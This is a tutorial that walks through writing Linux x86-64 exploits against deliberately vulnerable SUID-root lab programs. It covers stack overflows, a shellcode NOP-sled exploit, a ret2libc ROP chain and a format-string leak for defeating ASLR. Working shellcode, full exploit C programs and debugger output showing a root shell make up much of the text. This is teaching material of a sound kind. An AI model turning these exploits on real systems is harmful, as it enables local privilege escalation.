Exploit Development 101

In this article, I’m going to walk you through writing exploits that target specific vulnerabilities. Developing exploit code can be tricky, but we’ll break it down into steps to get a working exploit. We’ll start by understanding the different types of vulnerabilities we’re dealing with and how to identify them, I recommend checking out this great series by Pico: Programming Course for Wannabes,

A quick reminder memory, let’s reset the context Memory. The principle of exploiting a buffer overflow is to overwrite parts of memory that shouldn’t be controllable from attacker input and make the process execute code or change control flow. To see how and where an overflow takes place, let’s look at how memory is organized on a 64‑bit process.

code (.text) section, contains machine instructions the CPU executes. On x86‑64 the instruction pointer is RIP; it always contains the address of the next instruction to be executed. Control flow changes via CALL, RET, JMP or indirect transfers (function pointers, vtables).

data sections, globals/statics live in .data (initialized) and .bss (zeroed). Corrupting these changes program state or pointers.

heap, dynamic allocations from the allocator (malloc/new). Heap corruption (overwrites, metadata corruption, use‑after‑free) gives different primitives than stack bugs.

stack, used for arguments, return addresses, saved registers and locals. The user‑space stack is usually mapped at a high virtual address and grows down (toward lower addresses). The stack pointer is RSP and points at the top of the stack. PUSH decrements RSP then stores a value at the new top; POP loads from the top then increments RSP. Overwriting a saved return address (or saved RBP) is the classic stack‑based overflow.

Next, let’s take a look at an example of a simple function, modern style. A function is a piece of code in the code segment that is called, performs a task, and then returns to the caller. Arguments are usually passed in registers on x86‑64.

memory address        code
0x400500 <main+X>     pushq $0x0                 ;  push 
0x400507              call 0x400520 <function>   ;  CALL pushes return RIP
...
0x400520 <function>   pushq %rbp
0x400521              movq  %rsp, %rbp
0x400524              subq  $0x40, %rsp         ; 
0x400528              ; [local buffer lives here]
0x400528              popq  %rax                ; 
0x40052b              addq  $0xf00, %rax
0x400532              leave                     ; mov %rbp,%rsp ; pop %rbp
0x400533              ret

CALL automatically pushes the return address (RIP of the instruction after CALL). The function prologue saves RBP and makes a frame; locals (buffers) live below saved RBP. On x86‑64 the saved RBP and return address are 8 bytes each.

   HIGH ADDR
   0x7fff... +----------------------+  <- caller frame
             |  spilled args / args |
             +----------------------+
             |  return address (8)  |  <- pushed by CALL
             +----------------------+
             |  saved RBP (8)       |  <- pushed by callee prologue
             +----------------------+
             |  local vars / buffer |  <- buffer[0] .. buffer[n-1]
             +----------------------+
   LOW ADDR (grows down)

Commonly, a function saves the frame pointer RBP at the start (pushq %rbp; movq %rsp,%rbp) and restores it before returning. Inside the function you reference locals as offsets from RBP ([RBP-8], [RBP-16], …).

We just need to know the stack layout. At the top (higher addresses) you have the caller frame. Inside the callee, just below that are spilled args (if any), then the return address (8 bytes) pushed by CALL, then the saved RBP (8 bytes) pushed by the prologue, and below that the local buffers/vars belonging to the function.

  local buffer: bytes 0 .. 31   (32 bytes)
  saved RBP  : bytes 32 .. 39   (8 bytes)
  return addr: bytes 40 .. 47   (8 bytes)

So writing 40 bytes clobbers saved RBP but not the return address 41 bytes starts corrupting the return address (LSB) 48 bytes (0..47) fully overwrites it and can change RIP (x86‑64 is little‑endian, so write target address LSB first).

When we talk about dynamically allocated variables (those by malloc()) are placed on the heap. Whether the heap grows up or down is implementation and platform dependent on many systems the heap grows toward higher addresses, but that is not a universal guarantee. In a simple heap-based buffer overflow, we overflows a heap buffer and can overwrite adjacent heap data for example other dynamic allocations or allocator metadata which can lead to corruption, crashes, or exploitable behavior depending on the allocator and layout.

Plus, the stack is a separate region used for function locals, return addresses, and saved registers. On many arch the stack grows from high addresses toward low addresses, but again this is implementation dependent. Stack changes are effected by instructions that adjust the stack pointer and read/write memory for example PUSH/POPon many ISAs or explicit adjustments like subl $20, %esp on x86. PUSH places a value onto the stack by adjusting the stack pointer and then storing the value at the new top POP reads the value from the top of the stack and then adjusts the pointer back.

Stack-based overflows are the classic ones you’ve probably heard about happen when you copy more data into a local buffer than it can hold. Functions like strcpy(), strcat(), sprintf(), or the infamous gets() don’t care about boundaries they’ll just keep writing until something breaks. Let’s start with the vulnerable code so we can walk through it step-by-step and make this crystal clear.

void overflow_function (char *str)
{
  char buffer[20];
  strcpy(buffer, str);  // Function that copies str to buffer
}

int main()
{
  char big_string[128];
  int i;

  for(i=0; i < 128; i++)  // Loop 128 times
  {
    big_string[i] = 'A'; // And fill big_string with 'A's
  }
  overflow_function(big_string);
  exit(0);
}

The function tries to write 128 bytes of data into the 20-byte buffer, the extra 108 bytes spill out, overwriting the stack frame pointer, the return address, and the str pointer function argument. Then, when the function finishes, the program attempts to jump to the return address, which is now filled with As, which is 0x41 in hexadecimal.

The program tries to return to this address, causing the EIP to go to 0x41414141, which is basically just some random address that is either in the wrong memory space or contains invalid instructions, causing the program to crash and die. when overflow_function() is called the stack frame looks something like this:

  _________          __________________          ___________________________
 |         |        |                  |        |                           |
 | buffer  |------->|return address    |------->| Stack frame pointer (sfp) |
 |         |        |      (ret)       |        |                           |
 |_________|        |__________________|        |___________________________|
    _________________________                                
   |                         |                              
   |  *str (function arg)    | ---> [[[The Rest of the Stack]]]
   |_________________________|                                

The crashing as a result of a stack-based overflow isn’t really that interesting, but the reason it crashes is. If the return address were controlled and overwritten with something other than 0x41414141, such as an address where actual executable code was located,

then the program would “return” to and execute that code instead of dying. And if the data that overflows into the return address is based on user input, such as the value entered in a username field, the return address and the subsequent program execution flow can be controlled by the user.

Because it’s possible to modify the return address to change the flow of execution by overflowing buffers, all that’s needed is something useful to execute. This is where machine code injection comes into the picture. shellcode is just a cleverly designed piece of assembly code that is self-contained and can be injected into buffers,

— ret2 —

The most common piece of machine code is known as shellcode. This is a piece of shellcode that just spawns a shell. If a suid root program is tricked into executing shellcode, the attacker will have a user shell with root privileges, while the system believes the suid root program is still doing whatever it was supposed to be doing, hence ret2shellcode (return to shellcode).

But of course there’s a catch. OSes mark large swaths of memory as non-executable. Stacks and heaps are usually NX (non-executable) by default, so even if you manage to inject shellcode on the stack, the CPU will refuse to run it. Poof the old “ret > stack-shellcode” trick is dead on arrival.

Enter the next layer of nastiness ASLR (or KASLR in the kernel). It randomizes base addresses for stack, heap, libc and friends at process start. If you can’t predict where things live, you can’t reliably overwrite a return address to point at your shellcode or some fixed libc function.

That’s why, in CTFs and intentionally vulnerable programs, you often see things compiled without stack canaries / stack protectors. Compilers can insert a tiny secret value a “canary” between local buffers and control data. If an overflow trashes the return address, it usually trashes the canary too the runtime checks the canary on return and kills the process if it’s corrupted. This kills silent return-address overwrites dead.

Then there are W^X, PaX, exec-stack controls and kernel-level mitigations. Do they make exploitation impossible? Nah they make it much harder. They ain’t a panacea.

When NX is present, you can always move into code reuse what I mean by that is something like ret2libc which is basically the lazy cousin of shellcode you don’t inject new code, you reuse the C library. In a ret2libc the attacker overwrites a return address so execution hops into libc functions (think system()), often with a pointer to “/bin/sh” or by leveraging execl()/execve() calls. No shellcode required just a writable spot to stash a string and a predictable address to call. It’s simple, elegant, and brutally effective when ASLR or PIE aren’t getting in your way.

The program itself doesn’t do much it just mismanages memory. To make it really dangerous we’d change ownership to root and flip on the SUID bit so that when anyone runs the binary it executes with root privileges:

int main(int argc, char *argv[])
{
  char buffer[500];
  strcpy(buffer, argv[1]); // Vuln
  return 0;
}

If that binary is vulnerable to a stack buffer overflow, and we somehow make it execute our code, whatever we run will run with root privileges. That’s why SUID bugs are so attractive.

sudo chown root f00
sudo chmod +s f00
ls -l f00
-rwsr-sr-x 1 root users 4933 Sep 5 15:22 f00

We’ll set this up so the hardenings are in place and we can show how they block attacks. Then we’ll cover ret2libc and ROP techniques and walk through an example that uses an info leak to build a real exploit but first, let’s start basic easy mode CTF-style.

At first we must create shellcode, whose purpose is to give us root privileges. This means the actual address of the shellcode must be approximated, which can be difficult to know in a dynamically changing stack. Even if the correct address is approximated, the return address in the stack frame must be overwritten correctly otherwise, the program will just crash. Two techniques are commonly used to improve the likelihood of success.

The first is known as a NOP sled (NOP is short for “no operation”). On x86 architectures, a NOP instruction does nothing and consumes a single byte. In this context, NOPs are used as a “fudge factor” by creating a run of NOPs before the shellcode, if the instruction pointer lands anywhere in the sled, execution will slide through the NOPs into the shellcode, which will then execute properly.

The second technique is flooding the end of the buffer with repeated candidate return addresses. This increases the probability that the overwritten return address points somewhere in the NOP sled or directly to the shellcode.

  __________       ___________        _________________________
 |          |     |           |      |                         |
 | NOP sled | --->| ShellCode | ---> | Repeated return address |
 |__________|     |___________|      |_________________________|

Even using these techniques, the approximate location of the buffer in memory must be known. In simple lab programs, the buffer may be near the stack pointer, so the return address can be approximated relative to it. However, as mentioned earlier, this often won’t work in a real system… red zone, ASLR, and NX. Therefore we’ll keep it simple until we cover other techniques and tie everything together.

Reference: Programming for Wannabees. Part III. Your First Shell Code

— Write Your First Exploit —

Writing an exploit can certainly get the job done, but it introduces a barrier between the developer and the vulnerable application. The compiler handles many aspects of the exploit, which removes a layer of interactivity crucial for exploration and experimentation.

We assume ASLR (Address Space Layout Randomisation) is disabled, To gain a full understanding of this process, the ability to quickly test different scenarios is vital. With just a few tools specifically, Python and command substitution you can effectively exploit a vulnerable program.

$ python3 -c 'print("A"*20)'
$ python3 -c 'print("\x41"*20)'

This command prints the character A 20 times. For exploit development, we often need non-printable characters, Both commands yield AAAAAAAAAAAAAAAAAAAA. This output can be fed directly to our vulnerable program to see if protections enabled on the binary. This can be done with checksec tool:

	Arch:     amd64-64-little
	RELRO:    Partial RELRO
	Stack:    No canary found
	NX:       NX disabled
	PIE:      No PIE (0x400000)
	RWX:      Has RWX segments

Arch: tells architecture of binary,

Stack: tells if canary protection is enabled or not.
NX: tells if non-executable stack protection is enabled or not.
PIE: tells if Position Independent Execution is enabled or not.
RWX: tells if binary has read-write-executable pages.

RELRO: tells if the GOT section is read-only or not. There are three situtation of RELRO:

NO RELRO: GOT section is not read-only and it is after global variables.
Partial RELRO: GOT section is not read-only and it is before global variables.
Full RELRO: GOT section is read-only and it is before global variables.

In this case, Canary, NX and PIE are disabled, Here’s working 64-bit shellcode that spawns a shell

/*
section .text
    global _start

_start:
    ; Clear registers
    xor rsi, rsi       
    xor rdx, rdx        
    
    ; Build "/bin/sh" on stack
    push rsi            
    mov rdi, 0x68732f6e69622f  ; "/bin/sh" 
    push rdi           
    mov rdi, rsp       
    
    ; Set up execve syscall
    mov al, 0x3b        
    syscall
*/
/*

Alright, You can always use Pwntools it will save you a lot of trouble but in our case, we love to write our own exploits. Remember, this exploit assumes no ASLR and other mitigations. Let’s jump into it!

First, let’s take a look at the binary to find the stack address we need for our return. I’m using pwndbg you can use plain gdb, but I’ll use pwndbg throughout this piece.

b foo
Breakpoint 1 at 0x401166: file f00.c, line 6.
pwndbg> r AAAAAAAAAAAA...

Breakpoint 1, foo (input=0x7fffffffe2dc 'A' <repeats 79 times>) at f00.c:6
6	    strcpy(buffer, input);
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────[REGISTERS / show-flags off / show-compact-regs off]─────────────────────
 RAX  0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...'
 RBX  0x4011e0 (__libc_csu_init) ◂— endbr64 
 RCX  0x4011e0 (__libc_csu_init) ◂— endbr64 
 RDX  0x7fffffffdfb0 —▸ 0x7fffffffe32c ◂— 'SHELL=/bin/bash'
 RDI  0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAA...'
 RSI  0x7fffffffdf98 —▸ 0x7fffffffe2c5 ◂— 'f00'
 R8   0
 R9   0x7ffff7fe0d60 (_dl_fini) ◂— endbr64 
 R10  0
 R11  0
 R12  0x401070 (_start) ◂— endbr64 
 R13  0x7fffffffdf90 ◂— 2
 R14  0
 R15  0
 RBP  0x7fffffffde80 —▸ 0x7fffffffdea0 ◂— 0
 RSP  0x7fffffffde30 ◂— 0
 RIP  0x401166 (foo+16) ◂— mov rdx, qword ptr [rbp - 0x48]
───[DISASM / set emulate on]────────────────────────────────────────────────────
 ► 0x401166 <foo+16>    mov    rdx, qword ptr [rbp - 0x48]     RDX, [0x7fffffffde38] => 0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...'
   0x40116a <foo+20>    lea    rax, [rbp - 0x40]               RAX => 0x7fffffffde40 —▸ 0x400040 ◂— 0x400000006
   0x40116e <foo+24>    mov    rsi, rdx                        RSI => 0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...'
   0x401171 <foo+27>    mov    rdi, rax                        RDI => 0x7fffffffde40 —▸ 0x400040 ◂— 0x400000006
   0x401174 <foo+30>    call   strcpy@plt                  <strcpy@plt>
 
   0x401179 <foo+35>    nop    
   0x40117a <foo+36>    leave  
   0x40117b <foo+37>    ret    
 
   0x40117c <main>      endbr64 
   0x401180 <main+4>    push   rbp
   0x401181 <main+5>    mov    rbp, rsp
──────────────[ STACK ]──────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffde30 ◂— 0
01:0008│-048 0x7fffffffde38 —▸ 0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
02:0010│-040 0x7fffffffde40 —▸ 0x400040 ◂— 0x400000006
03:0018│-038 0x7fffffffde48 ◂— 0xf0b5ff
04:0020│-030 0x7fffffffde50 ◂— 0xc2
05:0028│-028 0x7fffffffde58 —▸ 0x7fffffffde87 ◂— 0x4011ca00
06:0030│-020 0x7fffffffde60 —▸ 0x7fffffffde86 ◂— 0x4011ca0000
07:0038│-018 0x7fffffffde68 —▸ 0x40122d (__libc_csu_init+77) ◂— add rbx, 1
────────────────[ BACKTRACE ]────────────────────────────────────────────────────
 ► 0         0x401166 foo+16
   1         0x4011ca main+78
   2   0x7ffff7de2083 __libc_start_main+243
   3         0x40109e _start+46
─────────────────────────────────────────────────────────────────────────────────
pwndbg> context stack
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────[ STACK ]────────────────────────────────────────
00:0000│ rsp 0x7fffffffde30 ◂— 0
01:0008│-048 0x7fffffffde38 —▸ 0x7fffffffe2dc ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....'
02:0010│-040 0x7fffffffde40 —▸ 0x400040 ◂— 0x400000006
03:0018│-038 0x7fffffffde48 ◂— 0xf0b5ff
04:0020│-030 0x7fffffffde50 ◂— 0xc2
05:0028│-028 0x7fffffffde58 —▸ 0x7fffffffde87 ◂— 0x4011ca00
06:0030│-020 0x7fffffffde60 —▸ 0x7fffffffde86 ◂— 0x4011ca0000
07:0038│-018 0x7fffffffde68 —▸ 0x40122d (__libc_csu_init+77) ◂— add rbx, 1
─────────────────────────────────────────────────────────────────────────────────
pwndbg> x/10gx $rsp
0x7fffffffde30:	0x0000000000000000	0x00007fffffffe2dc
0x7fffffffde40:	0x0000000000400040	0x0000000000f0b5ff
0x7fffffffde50:	0x00000000000000c2	0x00007fffffffde87
0x7fffffffde60:	0x00007fffffffde86	0x000000000040122d
0x7fffffffde70:	0x00007ffff7faf2e8	0x00000000004011e0
pwndbg> p &buffer
$1 = (char (*)[64]) 0x7fffffffde40
pwndbg> p $rbp
$2 = (void *) 0x7fffffffde80
pwndbg> x/gx $rbp+8
0x7fffffffde88:	0x00000000004011ca

From that blob we get the important info the offset to the saved return address is 0x7fffffffde88 - 0x7fffffffde40 = 72 bytes. So we must overwrite the return address after writing 72 bytes into buffer to jump back into our buffer we’d set the saved RIP to 0x7fffffffde40.

Here’s a look at exploit.c,

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

unsigned char sc[] = 
    "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73"
    "\x68\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";

int main() {
    char buf[200];
    unsigned long buf_addr = 0x7fffffffde40;  
    
    int sc_len = sizeof(sc) - 1;
    printf("Len: %d\n", sc_len);
    printf("Buf @ 0x%lx\n", buf_addr);
    
    // Build payload with NOP sled
    memset(buf, 0x90, sizeof(buf));  
    
    int offset = 20;
    memcpy(buf + offset, sc, sc_len);
    
    // Overwrite return address
    unsigned long *ret = (unsigned long*)(buf + 72);
    *ret = buf_addr + offset;
    
    printf("SC @ 0x%lx\n", buf_addr + offset);
    printf("Ret -> 0x%lx\n", buf_addr + offset);
    
    // Execute vulnerable binary
    char *argv[] = {"./f00", buf, NULL};
    execve("./f00", argv, NULL);
  
    return 1;
}

Finally, compile and execute the exploit,

Buf @ 0x7fffffffde40
Ret -> 0x7fffffffde54
# whoami
root
#

And there you have it! The exploit successfully overwrites the return address on the stack, which points to our NOP sled and shellcode. Since the vulnerable program has SUID root permissions, executing this shellcode grants us a root shell.

— Bypassing NX with ret2libc —

Alright, same vulnerable program, but this time we’re playing on hard mode the stack is non-executable (NX is enabled). We can’t just inject shellcode and jump to it. So what do we do? We borrow code that’s already there.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0

This is ret2libc (return-to-libc). The trick is simple, almost elegant you don’t inject new code, you reuse the C library. We overwrite the return address not with the address of our shellcode, but with the address of a function already in the process’s memory, like system(). Then, we set up the stack to make it look like system() was called normally with the argument "/bin/sh".

No shellcode required. Just a predictable address to call and a writable spot to stash a string. It’s simple, and brutally effective when ASLR or PIE aren’t getting in your way. This is where our first ROP gadget comes in. A gadget is a tiny snippet of existing code, usually ending in a ret instruction. Our stack layout needs to be a bit smarter now:

Lower Addresses
┌──────────────────────────────────┐
│ AAAAAA... (overflow data)        │ <- Our input buffer
│ [buffer bytes]                   │
│ [padding to saved RBP (if any)]  │
│ [saved RBP (8 bytes)]            │ <- Overwritten with junk (optional)
├──────────────────────────────────┤
│ [pop rdi; ret gadget addr]       │ <- Saved RIP points here
│ [ptr to "/bin/sh" string]        │ <- Gets popped into RDI (first arg)
│ [system() address]               │ <- `ret` lands here (call system)
│ [exit() address]                 │ <- where system() returns to
└──────────────────────────────────┘
Higher Addresses

So first let’s try to get the offset I’m using gdb-gef plugin, The flow is simple generate a cyclic pattern bigger than any input you’ll try, run the program under gdb with that pattern as argv, let it crash, then translate the crashed EIP value back to a pattern offset.

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0000000000000000
RBX: 0x00007ffff7dd18c0
RCX: 0x00007fffffffdc28
RDX: 0x0000000000000000
RSI: 0x00007fffffffdc70
RDI: 0x00007fffffffdc50
RBP: 0x4141414141414141
RSP: 0x00007fffffffdc10
RIP: 0x4141414141414141
EFLAGS: 0x00010202
...
Stopped reason: SIGSEGV
0x4141414141414141 in ?? ()

Take that RIP value (0x4141414141414141) and feed it to your pattern-offset helper:

gdb-peda$ pattern_offset 0x4141414141414141
152 found at offset: 152
gdb-peda$

So in this hypothetical the saved RIP got clobbered at byte 152 of the input (your number will vary depending on the binary). Use x/xxgx $rbp / x/xxgx $rsp to sanity-check memory and pattern bytes.

Before we try to overwrite things for real, confirm arch (32 vs 64), endianness, whether canaries/ASLR/NX are enabled, and whether the target honors execstack/loader rules otherwise your exploit will fail for reasons that look like “it just crashes”. So I think everything’s clear and self‑explanatory. Before we write an exploit, let’s actually see if this works:

gdb -q f00
gdb-peda$ run $(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*140 + b"\x80\x17\xe0\xf7" + b"\xc0\x40\xdf\xf7" + b"\xcc\xdd\xff\xff")')
Starting program: /home/pwnme/foo $(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*140 + b"\x80\x17\xe0\xf7" + b"\xc0\x40\xdf\xf7" + b"\xcc\xdd\xff\xff")')
[Attaching after process 3525 vfork to child process 3530]
[New inferior 2 (process 3530)]
[Detaching vfork parent process 3525 after child exec]
[Inferior 1 (process 3525) detached]
process 3530 is executing new program: /usr/bin/dash
[Inferior 2 (process 3530) exited normally]
gdb-peda$

Okay but wait how did we get the addresses for system() and exit() in the payload? Let’s back up a little. While we develop the exploit I’ll show you where those addresses come from and how I picked them.

— Your first ROP —

So the trick is simple we can discover runtime addresses for functions in libc using the dynamic loader. dlopen() loads (or returns a handle to) a shared library and dlsym() looks up a symbol by name and returns the memory address where that symbol is loaded. You could also grab system/exit from GDB (p system) when debugging, but for an exploit we often resolve them at runtime with dlopen/dlsym.

This usually done through leakin’ a libc address (puts GOT via puts@plt) then compute libc base and system/exit offsets.

void *handle = dlopen("libc.so.6", RTLD_LAZY);
void *system_addr = dlsym(handle, "system");
void *exit_addr = dlsym(handle, "exit");

Next we need a pointer to the string "/bin/sh". Two easy ways to get that at runtime:

Put the string directly into the payload buffer that gets copied by the vulnerable program; or
Stash it in an environment variable (I usually use this because it’s convenient and stable), then retrieve its address with getenv().

Address of EGG: 0xffffde12
Value at that address: "/bin/sh"

those addresses are just examples they’ll be different on your system and will move if ASLR is enabled.

Putting the pieces together

We locate the runtime address of system() (via dlsym() or from debugging).
We obtain a pointer to the "/bin/sh" string (via the buffer or an environment variable).
If control flow is redirected so that system() is invoked with that pointer as its argument, system() will spawn a shell (it internally invokes the shell to execute the passed command). After system() returns it typically calls exit() or returns to the caller depending on how it was invoked.

What system() does

system() expects one argument: a pointer to a NUL-terminated C string containing the command to run.
Internally it runs the command using the shell (e.g., execve("/bin/sh", ["sh", "-c", cmd], env)), so handing it "/bin/sh" will cause a shell to be executed.
On success you get a child process running that shell; on return control goes back to the caller (or it may call exit() depending on how the call chain is arranged).

A note on calling conventions & stack layout (why addresses matter)

On x86 the called function looks for its argument on the stack (or in registers on x8664 depending on ABI), so if you hijack control flow you must arrange for the right argument pointer to be where system() expects it. That’s why finding both system()’s address _and a reliable pointer to "/bin/sh" matters.
Also remember architecture/ABI differences (32-bit vs 64-bit) and endian-ness when you’re working with raw addresses.

So the exploit would look something like this exploit.c

/* gcc -o exploit exploit.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

uint64_t get_egg(void) {
  char * egg = getenv("EGG");
  if (!egg) {
    fprintf(stderr, "[-] EGG not set\n");
    exit(1);
  }
  printf("[+] EGG hatched at: 0x%016lx\n", (unsigned long) egg);
  return (uint64_t)(unsigned long) egg;
}

/* write 64-bit little-endian into buffer */
void to_le64(uint64_t val, unsigned char * buf) {
  buf[0] = (val >> 0) & 0xFF;
  buf[1] = (val >> 8) & 0xFF;
  buf[2] = (val >> 16) & 0xFF;
  buf[3] = (val >> 24) & 0xFF;
  buf[4] = (val >> 32) & 0xFF;
  buf[5] = (val >> 40) & 0xFF;
  buf[6] = (val >> 48) & 0xFF;
  buf[7] = (val >> 56) & 0xFF;
}

int main(void) {
  /* make sure EGG contains the string we will point at */
  setenv("EGG", "/bin/sh", 1);

  uint64_t pop_rdi_ret = 0x00000000004007c3ULL;
  uint64_t system_addr = 0x00007ffff7a33450ULL;
  uint64_t exit_addr = 0x00007ffff7a05e10ULL;

  uint64_t binsh_addr = get_egg(); /* "/bin/sh" in env */

  /* offset discovered with cyclic pattern */
  const int offset = 152; /* bytes until saved RIP */

  /*
     [ padding (offset bytes) ]
     [ pop_rdi_ret (8) ]
     [ binsh_addr  (8) ]
     [ system_addr (8) ]
     [ exit_addr   (8) ]
  */
  const int words = 4; /* pop_rdi, binsh, system, exit */
  const int size = offset + 8 * words;

  printf("[+] Offset to RIP: %d bytes\n", offset);
  printf("    pop_rdi; ret @ 0x%016lx\n", (unsigned long) pop_rdi_ret);
  printf("    system()      @ 0x%016lx\n", (unsigned long) system_addr);
  printf("    exit()        @ 0x%016lx\n", (unsigned long) exit_addr);
  printf("    \"/bin/sh\"    @ 0x%016lx\n", (unsigned long) binsh_addr);

  unsigned char * buf = malloc(size);
  if (!buf) {
    perror("malloc");
    return 1;
  }

  /* fill padding */
  memset(buf, 0x41, offset); /* 'A' */

  /* chain (little-endian 64-bit writes) */
  to_le64(pop_rdi_ret, buf + offset);
  to_le64(binsh_addr, buf + offset + 8);
  to_le64(system_addr, buf + offset + 16);
  to_le64(exit_addr, buf + offset + 24);

  char * args[] = {
    "./f00",
    (char * ) buf,
    NULL
  };

  execve("./f00", args, NULL);

  /* execve returns only on error */
  perror("execve");
  free(buf);
  return 1;
}

we hard‑code addresses into the payload because, remember, ASLR scrambles addresses and blows this trick up. That’s why this only works when ASLR (and others) are off.

It’s old‑school ret-style attacks were all the rage back in the day, but nowadays they’re a pain unless you’re hitting a really ancient box or a sloppy misconfiguration. In our case we flipped the mitigations off, so the dumb, simple technique actually works otherwise it’d just crash and burn.

— ASLR and info leaks —

Alright we’ve been playing on easy mode. How can we defeat NX, and ASLR? How does that usually work, and why? What do we need to achieve such an exploit, format strings? most think an information leak is harmless, and there’s some truth to that on it’s own, but leaks can provide a lot of critical information. let’s see how, time to write an exploit to defeat stack canaries, the NX bit, and ASLR.

So what is a format-string vulnerability? This vuln can be used to read or write memory (and, combined with other primitives, lead to code execution). The root problem is passing unchecked user input as the format parameter to formatting functions. Different specifiers behave differently and this matters for exploitation:

%x / %p: print values from the stack (formatted as hex / pointer) they read stack slots.
%s: treat the argument as a pointer and dereference it, printing the pointed-to string (can cause a crash if the pointer is invalid).
%n: writes the number of bytes printed so far to an address taken from the stack — this is a write primitive.

Using these correctly lets an attacker leak pointers (for ASLR bypass) or perform arbitrary writes (with careful control of positional parameters and widths).

The format string is the control parameter used by printf-family functions in stdio.h. The format string specifies how to render subsequent arguments into text. By default the result is printed to stdout.

Alright take a look at this

printf("Name: %s, Age: %d\n", "Lena", 25);

%s - string (expects a char * argument and dereferences it)
%c - single character
%d - signed integer
%f - floating-point
%p - pointer (prints an address)

Each % in the format string consumes a corresponding argument from the variadic argument list. In the example above there are two specifiers (%s and %d) and two corresponding arguments. The vulnerability appears when user input is passed as the format string itself, because printf will then interpret user-controlled specifiers and pull arbitrary data from the stack (or write via %n).

char input[100];
fgets(input, sizeof input, stdin);
printf(input);   // user controls the format string

See? printf expects a format string but we’re passing user input directly. If someone enters something like %x %x %x %x, printf will read data off the stack, leaking memory values it can even write to memory using %n, leading to code execution.

We’ve got the same vulnerable program, but now there’s a new twist: a format string bug right after the buffer overflow.

int main(int argc, char *argv[]) {
    char buffer[64];
    
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    
    strcpy(buffer, argv[1]);  
    printf(buffer);           
    printf("\n");
    
    return 0;
}

This printf(buffer) is our golden ticket. It demonstrates a powerful technique: using a leaked libc address (or a leaked GOT entry pointing into libc) to bypass ASLR, compute libc base, and construct a successful ret2libc or ROP-assisted ret2libc attack.

First,

    Arch:       amd64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX enabled  
    PIE:        No PIE (0x400000)

NX is enabled, so injected shellcode on the stack is not executable. But PIE is disabled, meaning the main binary’s addresses (including GOT) are fixed. The wildcard is ASLR, which randomizes libc/stack/heap base addresses each run.

cat  /proc/sys/kernel/randomize_va_space
2

ASLR (Address Space Layout Randomization) randomizes base addresses of shared libraries, stack, heap and other mappings so attackers cannot reliably predict where code/data reside.

The value 2 indicates that full randomization is enabled for ASLR. This randomizes all parts of the memory. Not only the stack but also other memory segments such as shared libraries, heap, memory managed through brk(), and other memory-mapped regions, will be randomized each time a program is executed.

On the other hand, if the value is 1, the memory-mapped addresses, stack, heap, and shared libraries are randomized. This is called partial randomization.

That’s why it’s easy On 32-bit systems cause the amount of addressable memory is significantly less, lower entropy in ASLR. Lower entropy makes it easier to guess or brute-force memory addresses.

However, We have two powerful primitives:

A format string bug to leak addresses from memory.
A stack buffer overflow to hijack execution flow.

ASLR randomizes the base addresses of the stack, heap, and libraries like libc. If you don’t know where system() or the “/bin/sh” string live, you can’t point your hijacked return address to them. It’s like knowing the street address but not the city.

While ASLR randomizes the base address of libc, it does not change the internal layout of the library the relative offsets between functions and symbols inside a given libc are constant. That is why leaking one libc address allows calculation of other libc addresses for the same libc binary/version.

This gives us a clear path to

Leak a known function’s address use the format string bug to print a known libc function address (like printf or system)
Calculate the libc base Take the leaked runtime address and subtract the function’s known static offset within libc. The result is the randomized base address of libc for this specific run. libc_base = leaked_system_addr - libc_system_offset
Find everything else Now that we know the base, we can calculate the runtime address of any other function or string in libc by adding their static offsets. system_runtime = libc_base + system_offset binsh_runtime = libc_base + binsh_offset

With these calculated addresses in hand, we can build a precise ret2libc or ROP chain, feeding it into the buffer overflow to finally pop a shell, killin’ ASLR in the process.

The offset it’s 72.

Let’s leak libc. Now that we know the overflow offset, and NX + ASLR are enabled, use the format string vuln to leak an address. Prefer leaking a GOT entry (printf@GOT or puts@GOT) if PIE is disabled GOT entries are at fixed binary addresses and point to libc functions at runtime, so leaking a GOT entry gives a direct libc pointer. If you only have stack leaks, ensure the leaked value falls within libc’s address range before using it.

If we leak an address that resides in libc, we can compute libc’s base: libc_base = leaked_addr - known_offset_in_libc. From libc base we derive addresses of system, the "/bin/sh" string, and ROP gadgets.

To identify a leaked address that belongs to the libc, we need to determine the range of addresses available within the libc library. Afterward, we can send multiple format specifiers like %x to extract some values from the stack.

If we come across an address within the libc’s address range while following this process, we can use that leaked address to calculate the libc base. Another approach involves examining the stack before the branch to printf() and identifying an address within the range of the libc base addresses. We will perform this later.

When you change input length the stack layout shifts, so positional specifiers like %N$p will reference different slots. Because the input itself lives on the stack, keeping probing inputs the same length makes positional indices stable while enumerating stack positions.

[ * ] Spraying
0x7fff7ecf942b[stack]
0x7ffcee70d738[stack]
0x7f0070243825[libc]
0x40123d[binary]
0x7f20c92032e8[libc]
0x4011f0[binary]
0x401090[binary]
0x7ffd48deeed0[stack]
0x7f1d881d1620[libc]
0x7ffd4df3cb78[stack]
0x401176[binary]
0x4011f0[binary]
0x401090[binary]
0x7ffdce773400[stack]
0x7ffd6757f9a8[stack]
0x7ffcd2fbf3e0[stack]
0x401090[binary]
0x7ffcfad41240[stack]
0x4010be[binary]
0x7ffeb0b99938[stack]
